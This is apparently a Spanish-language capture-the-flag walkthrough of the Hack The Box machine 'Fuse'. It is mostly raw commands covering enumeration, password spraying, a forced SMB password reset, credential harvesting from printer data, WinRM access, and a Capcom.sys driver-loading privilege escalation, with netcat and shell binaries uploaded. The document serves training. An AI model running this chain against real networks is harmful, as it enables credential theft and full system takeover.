nmap -A -p- -oA fuse 10.129.2.5 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210821165423.png

nmap -sC -sV -O -p- -oA fuse 10.129.2.5

nmap -sU -O -p- -oA active-udp 10.129.2.5

nikto -h 10.129.2.5:80

Pasted image 20210821170230.png

crackmapexec smb 10.129.2.5

smbclient -L 10.129.2.5 -N

Pasted image 20210821171512.png

rpcclient -U "" 10.129.2.5 -N

enumdomusers

Pasted image 20210821171755.png

whatweb http://10.129.2.5

Vamos a etc/hosts y agregamos fuse.fabricorp.local

Pasted image 20210821171928.png

whatweb http://10.129.2.5

Pasted image 20210821172001.png

Nos dirigimos a http://fuse.fabricorp.local

Pasted image 20210821172059.png

Creamos un archivo y ponesmo los usuarios que encontramos en la pagina.

crackmapexec smb 10.129.2.5 -u users.txt -p users.txt

Pasted image 20210821172448.png

cewl -w passwords http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

cat passwords

Pasted image 20210821172909.png

crackmapexec smb 10.129.2.5 -u users.txt -p passwords --continue-on-success | grep -v -i "failure"

Pasted image 20210821173515.png

smbpasswd -r 10.129.2.5 -U "bhult"

Creamos una contrasena nueva

Pasted image 20210821173802.png

crackmapexec smb 10.129.2.5 -u "bhult" -p "cu3rv0x123$"

Pasted image 20210821174832.png

rpcclient -U "bhult%cu3rv0x123$1" 10.129.2.5

Lo tienes que hacer rapido.

Pasted image 20210821175440.png

enumdomprinters

Pasted image 20210821175553.png

Adquirimos los usuarios y los metemos en un archivo

Pasted image 20210821182614.png

crackmapexec smb 10.129.2.5 -u users -p "fab@s3Rv1ce$1"

Pasted image 20210821182838.png

crackmapexec winrm 10.129.2.5 -u "svc-print" -p "fab@s3Rv1ce$1"

Pasted image 20210821182944.png

evil-winrm -i 10.129.2.5 -u "svc-print" -p "fab@s3Rv1ce$1"

Pasted image 20210821183049.png

whoami /priv

Pasted image 20210821183552.png

whoami /all

Pasted image 20210821183713.png

Pasted image 20210821183821.png

https://github.com/mach1el/htb-scripts/tree/master/exploit-fuse

Pasted image 20210821184714.png

Hacemos un upload a todos los archivos incluyendo nc.exe

mkdir C:\temp

cd temp

Pasted image 20220103170527.png

upload EOPLOADDRIVER.exe

upload ExploitCapcom_modded.exe

upload nc.exe

upload netcat.bat

upload shell.exe

Pasted image 20220103170407.png

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys

.\ExploitCapcom_modded.exe

Pasted image 20220103171045.png

whoami

Pasted image 20220103171409.png

boxes

copyright©2022 Cu3rv0x all rights reserved